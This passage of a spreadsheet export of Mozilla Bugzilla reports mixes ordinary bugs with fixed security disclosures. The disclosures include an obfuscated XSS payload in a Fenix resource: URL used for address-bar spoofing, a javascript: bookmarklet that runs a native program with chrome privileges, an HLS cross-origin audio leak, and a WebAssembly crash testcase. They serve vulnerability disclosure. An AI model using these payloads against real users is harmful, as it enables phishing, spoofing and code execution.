        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3642" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J3642" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3642" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3642" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3642" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3642" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3642" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3642" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main85+]</t>
        </is>
      </c>
      <c r="Q3642" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3642" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3642" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3642" t="n">
        <v>1</v>
      </c>
      <c r="U3642" t="n">
        <v>0</v>
      </c>
      <c r="V3642" t="n">
        <v>23</v>
      </c>
      <c r="W3642" t="inlineStr">
        <is>
          <t>Created attachment 9169943
resource_xss_address_bar_spoofing.gif
Bug 1657055 was fixed by escaping untrusted data in Kotlin-side code (below).
https://bugzilla.mozilla.org/attachment.cgi?id=9168100&amp;action=diff
But raw `innerHTML`s in the collesponding JavaScript-side code were kept remained (below).
https://github.com/mozilla-mobile/android-components/blob/d62f28374d7daf69991474a8f784c7cf8d556fce/components/browser/errorpages/src/main/assets/errorPageScripts.js#L23
These `innerHTML`s can still be used for XSS on `resource:` origin by loading templates directly (like below).
resource://android/assets/high_risk_error_pages.html?&amp;title=&lt;s&gt;XSS
resource://android/assets/low_and_medium_risk_error_pages.html?&amp;title=&lt;s&gt;XSS
Fenix can open `resource:` URLs shared from other apps through an intent (such as `SEND` intent).
Also, JavaScript code running on `resource:` can read/write error-pages shown in other window.
This means that Attacker can show fake error pages to Victim by sharing malicious `resource://` link from other apps such as SNS/SMS.
Then Fenix shows modified error page but the address bar shows an original `http(s)://` URL that made the error.
Following URL is demonstration of address bar spoofing attack by using above technique.
See also attached animation GIF.
resource://android/assets/high_risk_error_pages.html?&amp;title=%3Cimg%20src%3D%22%22%20onerror%3D%22eval(String.fromCharCode(100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C98%2C111%2C100%2C121%2C46%2C105%2C110%2C110%2C101%2C114%2C72%2C84%2C77%2C76%2C61%2C96%2C60%2C98%2C117%2C116%2C116%2C111%2C110%2C32%2C111%2C110%2C99%2C108%2C105%2C99%2C107%2C61%2C34%2C119%2C105%2C110%2C100%2C111%2C119%2C46%2C98%2C61%2C119%2C105%2C110%2C100%2C111%2C119%2C46%2C111%2C112%2C101%2C110%2C40%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C110%2C111%2C110%2C45%2C101%2C120%2C105%2C115%2C116%2C101%2C110%2C116%2C46%2C103%2C111%2C111%2C103%2C108%2C101%2C46%2C99%2C111%2C109%2C47%2C39%2C41%2C59%2C115%2C101%2C116%2C84%2C105%2C109%2C101%2C111%2C117%2C116%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C123%2C98%2C46%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C98%2C111%2C100%2C121%2C46%2C105%2C110%2C110%2C101%2C114%2C72%2C84%2C77%2C76%2C61%2C39%2C60%2C104%2C49%2C62%2C72%2C101%2C108%2C108%2C111%2C32%2C102%2C114%2C111%2C109%2C32%2C70%2C97%2C107%2C101%2C32%2C71%2C111%2C111%2C103%2C108%2C101%2C60%2C47%2C104%2C49%2C62%2C39%2C125%2C44%2C50%2C48%2C48%2C48%2C41%2C34%2C62%2C65%2C100%2C100%2C114%2C101%2C115%2C115%2C32%2C66%2C97%2C114%2C32%2C83%2C112%2C111%2C111%2C102%2C105%2C110%2C103%2C60%2C47%2C98%2C117%2C116%2C116%2C111%2C110%2C62%2C96))%22%3E
Steps to reproduce:
1. Open the above `resource:` link in Fenix
2. Following `&lt;button&gt;` tag is shown in `high_risk_error_pages.html` template by XSS
```
&lt;button onclick="window.b=window.open('https://non-existent.google.com/');setTimeout(function(){b.document.body.innerHTML='&lt;h1&gt;Hello from Fake Google&lt;/h1&gt;'},2000)"&gt;Address Bar Spoofing&lt;/button&gt;
```
3. Taps the button, then `https://non-existent.google.com` is opened in new window
4. Fenix shows `Address Not Found` error page on the window because accessed domain is non-existent 
5. Parent XSSed `resource:` page still have the access to the error page at 4), and page is manipulated.
6. Address bar in the child window still shows `https://non-existent.google.com`</t>
        </is>
      </c>
      <c r="X3642" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3643">
      <c r="A3643" t="n">
        <v>765628</v>
      </c>
      <c r="B3643" t="inlineStr">
        <is>
          <t>2012-06-17 16:35:57 -0700</t>
        </is>
      </c>
      <c r="C3643" t="inlineStr">
        <is>
          <t>Bookmarklets on the new tab page are able to run privileged javascript</t>
        </is>
      </c>
      <c r="D3643" t="inlineStr">
        <is>
          <t>2014-01-10 10:42:09 -0800</t>
        </is>
      </c>
      <c r="E3643" t="n">
        <v>1</v>
      </c>
      <c r="F3643" t="n">
        <v>1</v>
      </c>
      <c r="G3643" t="n">
        <v>2</v>
      </c>
      <c r="H3643" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3643" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3643" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3643" t="inlineStr">
        <is>
          <t>13 Branch</t>
        </is>
      </c>
      <c r="L3643" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3643" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3643" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3643" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3643" t="inlineStr">
        <is>
          <t>[social engineering][adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q3643" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3643" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3643" t="inlineStr">
        <is>
          <t>Firefox 17</t>
        </is>
      </c>
      <c r="T3643" t="n">
        <v>1</v>
      </c>
      <c r="U3643" t="n">
        <v>0</v>
      </c>
      <c r="V3643" t="n">
        <v>23</v>
      </c>
      <c r="W3643" t="inlineStr">
        <is>
          <t>Created attachment 633930
calc.html
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0
Build ID: 20120601173958
Steps to reproduce:
Clicking a javascript: url from the new tab page will run the script with full privileges. These javascript: urls are frequently used as 'bookmarklets' to run small javascript snippets. Were a malicious party able to socially engineer a user to bookmark a javscript bookmarklet and add it to the new FF13 "new tab page", when the user clicked the link from the new tab page privileged javascript would run.
The following is an example of privileged javascript which runs gcalctool on ubuntu: 
'javascript:var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);file.initWithPath("/usr/bin/gcalctool");var process = Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);process.init(file);var args = [];process.run(false, args, args.length);'
adding that url as a bookmark and launching it from the new tab page will run the native gcalctool executable. (For windows, change the path to a windows executable.)
I've attached a html page which demonstrates the steps a user would have to take.
I've marked the bug as security sensitive as bookmarklets are widely used.
Only tested on 32-bit firefox 13 running on ubuntu.</t>
        </is>
      </c>
      <c r="X3643" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3644">
      <c r="A3644" t="n">
        <v>45583</v>
      </c>
      <c r="B3644" t="inlineStr">
        <is>
          <t>2000-07-15 22:33:40 -0700</t>
        </is>
      </c>
      <c r="C3644" t="inlineStr">
        <is>
          <t>all users get added to a group if userregexp is null in editproducts.cgi</t>
        </is>
      </c>
      <c r="D3644" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E3644" t="n">
        <v>1</v>
      </c>
      <c r="F3644" t="n">
        <v>1</v>
      </c>
      <c r="G3644" t="n">
        <v>4</v>
      </c>
      <c r="H3644" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3644" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3644" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3644" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3644" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3644" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3644" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3644" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3644" t="inlineStr">
        <is>
          <t>2.12</t>
        </is>
      </c>
      <c r="Q3644" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3644" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3644" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T3644" t="n">
        <v>1</v>
      </c>
      <c r="U3644" t="n">
        <v>0</v>
      </c>
      <c r="V3644" t="n">
        <v>15</v>
      </c>
      <c r="W3644" t="inlineStr">
        <is>
          <t>When you create a new group in editprogucts.cgi and have usebuggroups active, it 
adds all users to the group if you leave the userregexp blank.  This is not the 
expected behaviour, since if I'm leaving it blank, I'm expecting to have to add 
people to it by hand.  I should have to enter a "." or somesuch (a regexp that 
actually does match all users) if I want it to do that.
If I want to create a new private product, it's a pain in the butt to go through 
and remove everyone else from the new product I just created.</t>
        </is>
      </c>
      <c r="X3644" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3645">
      <c r="A3645" t="n">
        <v>1512736</v>
      </c>
      <c r="B3645" t="inlineStr">
        <is>
          <t>2018-12-07 12:32:24 -0800</t>
        </is>
      </c>
      <c r="C3645" t="inlineStr">
        <is>
          <t>push updated bugzilla.mozilla.org live: mozillabteam/bmo:release-20181207.1</t>
        </is>
      </c>
      <c r="D3645" t="inlineStr">
        <is>
          <t>2018-12-12 07:42:28 -0800</t>
        </is>
      </c>
      <c r="E3645" t="n">
        <v>1</v>
      </c>
      <c r="F3645" t="n">
        <v>1</v>
      </c>
      <c r="G3645" t="n">
        <v>7</v>
      </c>
      <c r="H3645" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3645" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J3645" t="inlineStr">
        <is>
          <t>Infrastructure</t>
        </is>
      </c>
      <c r="K3645" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L3645" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3645" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3645" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3645" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3645" t="inlineStr"/>
      <c r="Q3645" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3645" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3645" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3645" t="n">
        <v>1</v>
      </c>
      <c r="U3645" t="n">
        <v>0</v>
      </c>
      <c r="V3645" t="n">
        <v>5</v>
      </c>
      <c r="W3645" t="inlineStr">
        <is>
          <t>bug 1354589 : Implement OAuth2 on BMO
bug 1511158 : Enhance comment action button style
bug 1506725 : Update form.doc to direct reporters to GitHub
bug 1512424 : Comment Reply button is not working properly on Chrome
bug 1511466 : The /api/user/profile API should provide the user's MFA status
bug 1511490 : BMO's oauth tokens should be use jwt
bug 1511558 : Guided form's Core Component dropdown list cannot be loaded
{
   "build" : "https://circleci.com/gh/mozilla-bteam/bmo/17237",
   "commit" : "463a0a598f7523c8cc80f197e837394cb72d2208",
   "source" : "https://github.com/mozilla-bteam/bmo",
   "version" : "20181207.1"
}</t>
        </is>
      </c>
      <c r="X3645" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3646">
      <c r="A3646" t="n">
        <v>1478843</v>
      </c>
      <c r="B3646" t="inlineStr">
        <is>
          <t>2018-07-26 16:23:01 -0700</t>
        </is>
      </c>
      <c r="C3646" t="inlineStr">
        <is>
          <t>Cross-origin audio leak in HLS</t>
        </is>
      </c>
      <c r="D3646" t="inlineStr">
        <is>
          <t>2024-05-30 09:47:19 -0700</t>
        </is>
      </c>
      <c r="E3646" t="n">
        <v>1</v>
      </c>
      <c r="F3646" t="n">
        <v>1</v>
      </c>
      <c r="G3646" t="n">
        <v>6</v>
      </c>
      <c r="H3646" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3646" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3646" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K3646" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3646" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3646" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3646" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3646" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3646" t="inlineStr">
        <is>
          <t>[adv-main63+][adv-esr60.3+]</t>
        </is>
      </c>
      <c r="Q3646" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3646" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3646" t="inlineStr">
        <is>
          <t>Firefox 64</t>
        </is>
      </c>
      <c r="T3646" t="n">
        <v>1</v>
      </c>
      <c r="U3646" t="n">
        <v>0</v>
      </c>
      <c r="V3646" t="n">
        <v>47</v>
      </c>
      <c r="W3646" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36
Steps to reproduce:
1. Go to https://test.shhnjk.com/hls/webvideo.html
2. Wait for video to stop playing and observe the alert saying "super bad"
Actual results:
Cross-origin audio data leaks. Audio tag on the right side will play stolen sound.
Expected results:
HTTP Live Stream is supported in Firefox for Android. And the M3U8 file allows audio data to be fetched from other origin. But Firefox only checks the url and misses the following redirect in https://test.shhnjk.com/hls/same.m3u8
#EXT-X-MEDIA:TYPE=AUDIO,GROUP-ID="audio",NAME="English stereo",LANGUAGE="en",AUTOSELECT=YES,URI="https://test.shhnjk.com/location.php?url=https://vuln.shhnjk.com/audio.m3u8"
Where audio file is redirected and provided from "https://vuln.shhnjk.com/audio.m3u8". We can abuse this missed check to steal the audio samples using Web Audio API and read the audio data across-origin.</t>
        </is>
      </c>
      <c r="X3646" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3647">
      <c r="A3647" t="n">
        <v>120634</v>
      </c>
      <c r="B3647" t="inlineStr">
        <is>
          <t>2002-01-17 13:01:00 -0800</t>
        </is>
      </c>
      <c r="C3647" t="inlineStr">
        <is>
          <t>Typing numbers in sidebar (IM password) affects label colors in Mail</t>
        </is>
      </c>
      <c r="D3647" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E3647" t="n">
        <v>1</v>
      </c>
      <c r="F3647" t="n">
        <v>1</v>
      </c>
      <c r="G3647" t="n">
        <v>2</v>
      </c>
      <c r="H3647" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3647" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3647" t="inlineStr">
        <is>
          <t>MailNews: Message Display</t>
        </is>
      </c>
      <c r="K3647" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3647" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3647" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N3647" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3647" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3647" t="inlineStr">
        <is>
          <t>has patch</t>
        </is>
      </c>
      <c r="Q3647" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3647" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3647" t="inlineStr">
        <is>
          <t>mozilla0.9.9</t>
        </is>
      </c>
      <c r="T3647" t="n">
        <v>0</v>
      </c>
      <c r="U3647" t="n">
        <v>0</v>
      </c>
      <c r="V3647" t="n">
        <v>17</v>
      </c>
      <c r="W3647" t="inlineStr">
        <is>
          <t>Saw this all platforms:
Win32 2002-01-17-06 Trunk
Linux 2002-01-17-08 Trunk
Mac 2002-01-17-08 Trunk
Steps to repro:
1)Go to Mail. Select a mail in the thread pane by clicking on it once so it
highlights
2)In sidebar Buddy list (within mail), logoff of IM if you are logged in
3)Drag across the password field for IM login, and type some numbers in there
Actual results: Note that the selected mail label changes colors
------- Additional Comments From ssu@netscape.com 2002-01-17 13:12:17 ----
This bug should be moved to bugzilla.  scalkins, do you have access to do the move?
reassigning to myself.
------- Additional Comments From ssu@netscape.com 2002-01-17 13:14:59 ----
forgot to mention that this also happens when hitting numbers in the quick
search edit field.
------- Additional Comments From laurel@netscape.com 2002-01-17 13:22:25 ----
I believe there's a general focus bug for QuickSearch -- if the focus is
properly set in the text field, there is no label shortcut inteference.
Also, I found the interference is also present in the stocks tab of the sidebar.
 Maybe any tab in the sidebar would have this problem?
------- Bug moved to this database by lchiang@netscape.com 2002-01-17 13:32 -------
This bug previously known as bug 11825 at http://bugscape.netscape.com/
http://bugscape.netscape.com/show_bug.cgi?id=11825
Originally filed under the InstantMessenger product and Mail component.
Skipping unknown keyword: correctness.</t>
        </is>
      </c>
      <c r="X3647" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3648">
      <c r="A3648" t="n">
        <v>1450690</v>
      </c>
      <c r="B3648" t="inlineStr">
        <is>
          <t>2018-04-02 08:02:18 -0700</t>
        </is>
      </c>
      <c r="C3648" t="inlineStr">
        <is>
          <t>The telemetry event is not created for the opt-out-study enrollment</t>
        </is>
      </c>
      <c r="D3648" t="inlineStr">
        <is>
          <t>2018-05-13 17:51:18 -0700</t>
        </is>
      </c>
      <c r="E3648" t="n">
        <v>1</v>
      </c>
      <c r="F3648" t="n">
        <v>1</v>
      </c>
      <c r="G3648" t="n">
        <v>2</v>
      </c>
      <c r="H3648" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3648" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3648" t="inlineStr">
        <is>
          <t>Normandy Client</t>
        </is>
      </c>
      <c r="K3648" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3648" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3648" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3648" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3648" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3648" t="inlineStr"/>
      <c r="Q3648" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3648" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3648" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T3648" t="n">
        <v>1</v>
      </c>
      <c r="U3648" t="n">
        <v>0</v>
      </c>
      <c r="V3648" t="n">
        <v>55</v>
      </c>
      <c r="W3648" t="inlineStr">
        <is>
          <t>[Affected versions]:
- 61.0a1 (2018-04-02)
- 60.0b8 build1 (20180329154119)
[Affected platforms]:
- Windows 10 x64
- Ubuntu 16.04 x64
- macOS 10.13.3
[Preconditions]
- You need access to SHIELD Control Panel ( https://normandy-admin.stage.mozaws.net/ )
- Set the 'app.normandy.dev_mode' preference to 'true' to run recipes immediately on startup.
- Set the 'app.normandy.logging.level' preference to '0' to enable more logging.
- Set the 'security.content.signature.root_hash' preference to 'DB:74:CE:58:E4:F9:D0:9E:E0:42:36:BE:6C:C5:C4:F6:6A:E7:74:7D:C0:21:42:7A:03:BC:2F:57:0C:8B:9B:90'.
- Set the preference value for 'app.normandy.api_url' to 'https://normandy.stage.mozaws.net/api/v1'.
[Steps to reproduce]:
1. Open the SHIELD Control Panel.
2. Create, approve and publish a new opt-out-study recipe. 
3. Launch Firefox having the pre-requisites set and open:
   - browser console
   - about:studies
   - about:telemetry (locate the Events tab and choose "dynamic" in top right corner dropdown)
   - about:addons
[Expected result]:
- [step 3] - Browser console will show that the recipe has been successfully fetched and executed
           - about:studies will list the current study as active
           - about:telemetry will display the details about the current event
           - The chosen extension is downloaded, installed and listed as enabled in about:addons 
[Actual result]:
- [step 3] - The recipe is displayed as fetched and executed, but the 'Invalid extra key for event ["normandy", "enroll", "addon_study"].  (unknown)'  JS warning is displayed in Browser Console (see the screenshot https://drive.google.com/file/d/1BmOmdUbHXqJPm3ideuiBwZqS3ZezMX3q/view?usp=sharing) 
           - The current study is displayed as active in about:studies
           - There is no event created in about:telemetry for the current opt-out-study
           - The extension is successfully installed and enabled 
[Regression range]:
- The issue was introduced on 60.0a1 (2018-03-07) 
- It seems that it was regressed by bug 1439519
[Additional notes]
- If using a corrupt extension, the unenrollment event is properly created in about:telemetry</t>
        </is>
      </c>
      <c r="X3648" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3649">
      <c r="A3649" t="n">
        <v>1777604</v>
      </c>
      <c r="B3649" t="inlineStr">
        <is>
          <t>2022-06-30 14:00:07 -0700</t>
        </is>
      </c>
      <c r="C3649" t="inlineStr">
        <is>
          <t>Assertion failure: instCache_[offset] == instValue, at jit/arm64/vixl/MozCachingDecoder.h:77</t>
        </is>
      </c>
      <c r="D3649" t="inlineStr">
        <is>
          <t>2024-05-30 10:57:40 -0700</t>
        </is>
      </c>
      <c r="E3649" t="n">
        <v>1</v>
      </c>
      <c r="F3649" t="n">
        <v>1</v>
      </c>
      <c r="G3649" t="n">
        <v>3</v>
      </c>
      <c r="H3649" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3649" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3649" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K3649" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3649" t="inlineStr">
        <is>
          <t>ARM64</t>
        </is>
      </c>
      <c r="M3649" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3649" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3649" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3649" t="inlineStr">
        <is>
          <t>[adv-main105+][adv-esr102.3+]</t>
        </is>
      </c>
      <c r="Q3649" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3649" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S3649" t="inlineStr">
        <is>
          <t>105 Branch</t>
        </is>
      </c>
      <c r="T3649" t="n">
        <v>1</v>
      </c>
      <c r="U3649" t="n">
        <v>0</v>
      </c>
      <c r="V3649" t="n">
        <v>42</v>
      </c>
      <c r="W3649" t="inlineStr">
        <is>
          <t>```js
for (let i = 0; i &lt; 99; i++) {
    relazifyFunctions();
    const { Instance, compileStreaming } = WebAssembly;
    function f(x, g) {
        var cache = streamCacheEntry(wasmTextToBinary(x));
        compileStreaming(cache).then(function (m) {
            g(new Instance(m, undefined));
            return compileStreaming(cache);
        }).then(function (m) {
            g(new Instance(m, undefined));
        });
        drainJobQueue();
    }
    f('(module \
        (func $test (param i64) (result f64) local.get 0 f64.convert_u/i64 )\
        (func (export "run") (result i32) i64.const 1 call $test f64.const 1 f64.eq )\
    )', function (i) {});
    f('(module \
        (func (export "run") (result i64) (i64.const 1))\
    )', function (i) {
        i.exports.run();
    });
}
```
```
Thread 1 "js-dbg-64-armsi" received signal SIGSEGV, Segmentation fault.
0x00005555578cbe0d in vixl::CachingDecoder::Decode (this=0x7ffff6a03df0, instr=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozCachingDecoder.h:76
76	    MOZ_ASSERT_IF(val != InstDecodedKind::NotDecodedYet,
(gdb) bt
#0  0x00005555578cbe0d in vixl::CachingDecoder::Decode (this=0x7ffff6a03df0, instr=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozCachingDecoder.h:76
#1  0x00005555578cbbfc in vixl::Simulator::ExecuteInstruction (this=this@entry=0x7ffff6a35100) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:239
#2  0x00005555578cf5c3 in vixl::Simulator::Run (this=0x7ffff6a35100) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/Simulator-vixl.cpp:70
#3  0x00005555578ccde0 in vixl::Simulator::RunFrom (this=0x7ffff6a35100, first=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/Simulator-vixl.cpp:78
#4  vixl::Simulator::call (this=0x7ffff6a35100, entry=&lt;optimized out&gt;, argument_count=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:327
#5  0x0000555557d4b6bf in js::wasm::Instance::callExport (this=0x7ffff5583300, cx=0x7ffff6a2d000, funcIndex=0, args=..., level=js::wasm::CoercionLevel::Spec) at /home/skygentoo/trees/mozilla-central/js/src/wasm/WasmInstance.cpp:2197
#6  0x0000555557d8c945 in WasmCall (cx=cx@entry=0x7ffff6a2d000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/wasm/WasmJS.cpp:2176
#7  0x0000555556c4edc0 in CallJSNative (cx=cx@entry=0x7ffff6a2d000, native=native@entry=0x555557d8c7e0 &lt;WasmCall(JSContext*, unsigned int, JS::Value*)&gt;, reason=&lt;optimized out&gt;, reason@entry=js::CallReason::Call, args=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:421
#8  0x0000555556c40bd8 in js::InternalCallOrConstruct (cx=0x7ffff6a2d000, cx@entry=0x7ffff6af8e98, args=..., construct=construct@entry=js::NO_CONSTRUCT, reason=(js::CallReason::Getter | js::CallReason::Setter | unknown: 0xf7c86720), reason@entry=js::CallReason::Call) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:508
#9  0x0000555556c4181e in InternalCall (cx=&lt;optimized out&gt;, args=..., reason=reason@entry=js::CallReason::Call) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:575
#10 0x0000555556c41789 in js::CallFromStack (cx=0x7ffff7c87a60 &lt;_IO_stdfile_2_lock&gt;, args=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:579
#11 0x0000555557668199 in js::jit::DoCallFallback (cx=0x7ffff7c87a60 &lt;_IO_stdfile_2_lock&gt;, frame=&lt;optimized out&gt;, stub=0x7ffff6af8e98, argc=&lt;optimized out&gt;, vp=0x7ffff687fa08, res=...) at /home/skygentoo/trees/mozilla-central/js/src/jit/BaselineIC.cpp:1580
#12 0x00005555578ce4d4 in vixl::Simulator::VisitCallRedirection (this=this@entry=0x7ffff6a35100, instr=&lt;optimized out&gt;, instr@entry=0x7ffff6a42c68) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:739
#13 0x00005555578cd090 in vixl::Simulator::VisitException (this=0x7ffff6a35100, instr=0x7ffff6a42c68) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:447
#14 0x000055555787ae2d in vixl::Decoder::VisitException (this=&lt;optimized out&gt;, instr=0x7ffff6a42c68) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/Decoder-vixl.cpp:876
#15 0x00005555578cc192 in vixl::CachingDecoder::Decode (this=0x7ffff6a03df0, instr=0x7ffff6a42c68) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:1127
#16 0x00005555578cbbfc in vixl::Simulator::ExecuteInstruction (this=this@entry=0x7ffff6a35100) at /home/skygentoo/trees/mozilla-central/js/src/jit/arm64/vixl/MozSimulator-vixl.cpp:239
